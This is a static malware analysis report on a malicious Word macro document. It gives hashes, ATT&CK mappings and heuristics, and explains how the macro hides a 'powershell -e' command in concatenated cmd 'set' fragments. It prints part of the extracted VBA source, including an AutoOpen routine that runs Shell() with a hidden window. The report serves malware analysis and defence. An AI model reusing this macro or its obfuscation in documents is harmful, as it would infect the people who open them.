Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fd7fecdc3d19ffdf…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 102.2 KB
Created: 2018-06-05 12:05:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: 802a2af119a403979a3443abba3dd47e
SHA-1: 9085c2722506f4235c852e3fb9b88664ffb3ca14
SHA-256: fd7fecdc3d19ffdfe7acf86b42e4be623302e86c812d2eed4dd3ed214becfe6f
Risk score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 User Execution: Malicious File

The sample is a Word document carrying a VBA macro. Sub Autoopen() runs when the document is opened with macros enabled and calls jmznhcvAS(), which passes a string assembled from concatenated fragments to Shell(); the window-style argument `27669 - 27669` evaluates to 0 (vbHide), so the process window is hidden. Every name that is never assigned (ArXizituRT, IFpdIcYoT, mpLlCQLwii and the operands of the Hex(), Cos() and CDate() padding calls) evaluates to Empty, so Chr(IFpdIcYoT + vbKeyC + mpLlCQLwii) is Chr(67) = "C" and the command line handed to Shell() opens with "Cmd GqGMMjv EKXmaYwhWwrOpmdirGUNBAho QcT IluAvEj & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c ...": junk tokens, an `&`, then cmd.exe invoked through %comspec% (the carets are cmd escape characters that drop out) with delayed environment-variable expansion (/V). The text returned by LrjhrUb() is a chain of `set` statements that store the pieces p, ow, er, s, he and ll in environment variables with random names, followed by a statement that expands them with !name! syntax to spell "powershell -e <base64>". The base64 text is UTF-16LE, as PowerShell's -e expects; the part visible in the preview decodes to `.( $enV:cOMspec[4,26,25]-JOin'')(nEW-oBJECT  sYSTem.Io.C`, where $env:ComSpec[4,26,25] picks the letters i, e, x out of the default C:\WINDOWS\system32\cmd.exe path, i.e. iex (Invoke-Expression) applied to an expression starting with a System.IO object. The remainder of the script is cut off in the preview, so the download-and-execute behaviour of the second stage is inferred from this well-known pattern rather than observed in the extracted source.

Heuristics (6)

  • VBA macros detected (medium) OLE_VBA_MACROS, 3 related findings
    Document contains VBA macro code.
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    The macro calls Shell() to start an external process. Here the argument is assembled from concatenated string fragments (functions LrjhrUb and hAmPT in the preview) and the window-style argument evaluates to 0 (vbHide), so nothing is shown to the user.
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    Sub Autoopen() runs as soon as the document is opened with macros enabled, so the only user action required is the enable-content click (T1204.002).
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) stream contains an auto-execution token together with shell/download/object-execution tokens. This rule also covers p-code-only documents (stomped or unrecoverable source), where no visible source is available.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the "no VBA project recovered" part of the canned description is contradicted by the extracted macros.bas below; treat the finding as redundant with OLE_VBA_AUTOOPEN here.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the DrawingML XML namespace identifier, a schema string present in any document with embedded drawing data, not a network indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12297 bytes
SHA-256: b3735de9b599c03c41b4b0cd5c350661ac95721a1e891384f6cb98d0978da8aa

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "HRYawRwHzM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function jmznhcvAS()
On Error Resume Next
zskKII = Hex(BvAoF + Hex(QivOGU) * 98183 + Round(cVCuW))
McYYd = Cos(foXWVG)
tSCdbw = CDate(dSndR)
PXXXiQ = Cos(BLYXbK)
CcKZs = Hex(pFlZra + Hex(UdupuH) * 58338 + Round(HQAnF))
chufB = Cos(azAHN)
RJKmwf = CDate(RRYRj)
UjDvLK = Cos(mfMXru)
jmznhcvAS = sITacKZ + Shell(ArXizituRT + Chr(IFpdIcYoT + vbKeyC + mpLlCQLwii) + LrjhrUb + hAmPT + MbzXTjPunS + APSlDwi + KqSTw + LimwhMPbj, 27669 - 27669)
KYUcnb = Hex(pVIVS + Hex(fnCEQ) * 20821 + Round(hjWEo))
bwmwnu = Cos(qztzv)
HTfLuZ = CDate(qGwcIG)
rHaBPn = Cos(zKDZVa)
End Function
Sub Autoopen()
On Error Resume Next
dhtFI = Hex(CjCYcf + Hex(GVzKnj) * 27255 + Round(iWshH))
IIcmYw = Cos(MYFWzV)
IFCZks = CDate(iLslpM)
uKBYA = Cos(uaamDj)
jmznhcvAS
uwuoo = Hex(kDdUT + Hex(OEizjB) * 67037 + Round(iRODzw))
iifPV = Cos(dphQE)
iczRpi = CDate(msQcql)
ukciq = Cos(pmBVzF)
End Sub


Attribute VB_Name = "skOwhfEEKjzYVV"
Function LrjhrUb()
On Error Resume Next
dEJwvr = Hex(wjYzYO + Hex(wTaIaD) * 56906 + Round(CsVEdS))
jQRch = Cos(zjXJG)
jQoTp = CDate(WXoiEQ)
wuCRd = Cos(OiiwIf)
jnjNRE = "md Gq" + "GMMjv EKXma" + "YwhW" + "wrOpmdirGUNBAho"
jKzjCz = Hex(wuSNY + Hex(aHudFM) * 2695 + Round(iWzSu))
sdETf = Cos(twLYEb)
zOEco = CDate(zQGjBr)
idznBR = Cos(haTpz)
TTOGmUzi = "QcT IluAvEj " + "&     " + "%^c^" + "o^m^S^p^E^c^%  " + "   %^c^o" + "^m^S^p^E^c^% " + "    " + "/V         " + "/c   "
kmivWY = Hex(GEEiuI + Hex(zBltDb) * 68528 + Round(QwYWn))
XWuPd = Cos(HKmLM)
OpaZTt = CDate(qKfoZm)
waVfX = Cos(lJjhJ)
zpWpozGCi = "        set" + " %FUvE" + "wAwEPzPLEdi%=Z" + "aaCJqzKw" + "d&&s" + "et " + "%TXJMuwH"
QBSmO = Hex(jaMukr + Hex(idwKri) * 40545 + Round(FIhoHn))
rFGsP = Cos(drYXR)
sMLEq = CDate(AtWowr)
omLtkz = Cos(mUiHn)
RinCFXWwPu = "zzASw%=p&" + "&set %brp" + "jFicY%=" + "o^w&&set " + "%jNM" + "wOuqC" + "XOvCXNF%=RpAROX" + "iQUZVCZP&&"
bZBlYm = Hex(TcQuEq + Hex(GupDG) * 29118 + Round(bSRwnZ))
bYiEQ = Cos(DarlQM)
fMVRp = CDate(nBrifA)
zAGjn = Cos(MRsDmp)
ddvXVtUXnO = "se" + "t " + "%j" + "VVXrDUiHpvSkz%" + "=!" + "%TXJMuwH"
rGfDEm = Hex(wOPzAI + Hex(mIkuzD) * 83722 + Round(DUIwj))
wnIjbB = Cos(jVoas)
ajlJi = CDate(qaJHJn)
wqDLuF = Cos(uzbHN)
ZUwlursfzb = "zzASw%!&&set" + " %WlI" + "TTirTlVUBFQY%=D" + "NzNYIJiO" + "J&&set %lWPK" + "Qmlh" + "WR%=e^r&&set %J" + "wZXfK" + "WOAa%=!%brpjFic" + "Y%!&&set %laz"
HrFmw = Hex(GzRSR + Hex(ZTpZp) * 60694 + Round(wpFMdK))
UlMaIi = Cos(JXzVWL)
joiYlA = CDate(mRVKv)
RjCfc = Cos(CzUlrK)
KDhUCVWwLUL = "JLkG" + "lUDDP%=s&&s" + "et %jwb" + "oZodIrKuEtWE%" + "=EfwMROr" + "wWHEMqO&&set %" + "Pz" + "CmKMTKNv%=h" + "e&&set %nzj" + "jUMS"
OQwpES = Hex(IPAan + Hex(JYiUrQ) * 23753 + Round(iZUUt))
IpLDnN = Cos(lEpcQr)
zBjcrk = CDate(iRAua)
SjqbUL = Cos(LTEzm)
GQdPtlOwCw = "iBNaB%=ll&&!%jV" + "VXrDUiHpvSk" + "z%!!%" + "JwZXfKWOAa" + "%!!%lWPKQmlh" + "WR%!!%la" + "zJLkGlU" + "DDP%!!%Pz"
tXTsra = Hex(kVdqs + Hex(IbiXLI) * 24836 + Round(fBONH))
TQjwl = Cos(RqvLZI)
CNwGA = CDate(rCzhvt)
ZJNVFf = Cos(UFUojE)
HMjBwFbi = "CmKMTKNv%!!%nz" + "jjUMSiBN" + "aB%!  -e IAAu" + "ACgAI" + "AAkAGUAbgBW" + "ADoAYwBPAE0Ac" + "wBwAGUAYwBbADQA" + "LAA"
MRfSw = Hex(oKCjv + Hex(iQCWj) * 71886 + Round(wQHca))
uYzws = Cos(Zvjfl)
OwqzO = CDate(iZrAT)
jlDdI = Cos(EoFMEd)
MZuvOzm = "yADYALAAyADUAXQ" + "AtAEoATwBpAG4AJ" + "wAnACkAK" + "ABuAEUAVwAtAG8" + "AQgBKAEUA" + "QwBUAC"
LrjhrUb = jnjNRE + TTOGmUzi + zpWpozGCi + RinCFXWwPu + ddvXVtUXnO + ZUwlursfzb + KDhUCVWwLUL + GQdPtlOwCw + HMjBwFbi + MZuvOzm
End Function
Function hAmPT()
On Error Resume Next
OKbWRw = Hex(REUoMw + Hex(AwAOt) * 8576 + Round(NHEwnt))
wMCsMK = Cos(wDDaC)
zfQPQL = CDate(EqEzLZ)
ACWZd = Cos(LVrSv)
MAjqCsPjf = "AAIABzAFkA" + "UwBUAGUAbQ" + "AuAEkA" + "bwAuAEMA"
mADuwo = Hex(Viirpf + Hex(HVGIEh) * 75953 + Round(zujdw))
XinzTQ = Co
... (truncated)